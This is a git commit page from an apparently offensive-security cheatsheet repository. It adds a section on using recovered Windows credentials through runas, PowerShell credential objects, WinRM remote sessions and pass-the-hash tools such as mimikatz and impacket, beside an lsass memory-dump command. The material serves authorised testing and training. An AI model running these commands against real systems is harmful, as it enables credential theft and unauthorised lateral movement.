daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit 5dd2e20b2a0af378477089eee8a01c40c52532f9
parent 649ce0747272850e9e39961d03482817c8b934b4
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date:   Thu, 17 Sep 2026 00:44:06 +0100

Add runas/PSCredential guide for running a session as another user

Covers CMD runas (incl. /netonly and /savecred) and PowerShell
Start-Process/New-PSSession/Invoke-Command with a PSCredential object,
plus a pointer to pass-the-hash tools when only a hash is available.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

Diffstat:
Msrc/content/sheets/password-attacks/windows-credential-flag-hunting.md | 52++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+), 0 deletions(-)

diff --git a/src/content/sheets/password-attacks/windows-credential-flag-hunting.md b/src/content/sheets/password-attacks/windows-credential-flag-hunting.md @@ -239,6 +239,58 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C: --- +## Phase 7 — Using a Found Password (run a session as another user) + +Once you've recovered a username + password, spawn a shell running as that user instead of just verifying the cred worked. + +### CMD — `runas` +```cmd +:: Prompts for the password interactively +runas /user:DOMAIN\targetuser cmd + +:: Local (non-domain) account +runas /user:targetuser cmd + +:: /netonly — use when the account is only valid on a REMOTE box (no local +:: logon rights here); local commands still run as YOU, but anything that +:: hits the network authenticates as targetuser. Avoids a failed local logon. +runas /netonly /user:DOMAIN\targetuser cmd + +:: Reuse a credential CMD already cached (see `cmdkey /list` above) +runas /savecred /user:DOMAIN\targetuser cmd +``` + +### PowerShell — build a credential object +```powershell +# Prompts for the password securely (or build SecureString from a known plaintext) +$cred = Get-Credential DOMAIN\targetuser +# Non-interactive, from a known plaintext (lab/CTF use): +$pass = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force +$cred = New-Object System.Management.Automation.PSCredential('DOMAIN\targetuser', $pass) + +# New process as that user (own console window) +Start-Process powershell -Credential $cred + +# Interactive shell in the CURRENT console (no new window) +$si = New-Object System.Diagnostics.ProcessStartInfo +$si.FileName = 'powershell.exe' +$si.UserName = 'targetuser'; $si.Domain = 'DOMAIN' +$si.Password = $pass +[System.Diagnostics.Process]::Start($si) + +# Remote session / lateral movement as that user (WinRM must be enabled on target) +Enter-PSSession -ComputerName TARGET -Credential $cred +$s = New-PSSession -ComputerName TARGET -Credential $cred +Invoke-Command -Session $s -ScriptBlock { whoami } + +# Run one command as the user without a full session +Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami /all } +``` + +> **Note —** `runas` and `Start-Process -Credential` need the password (or hash via `/netonly` + `mimikatz sekurlsa::pth`); they don't accept an NTLM hash directly. For hash-only creds, pass-the-hash instead: `impacket-psexec`, `impacket-wmiexec`, or `evil-winrm -i TARGET -u user -H <NTLMhash>`. + +--- + ## Quick Wins Checklist - [ ] `Get-Content (Get-PSReadlineOption).HistorySavePath` — PS history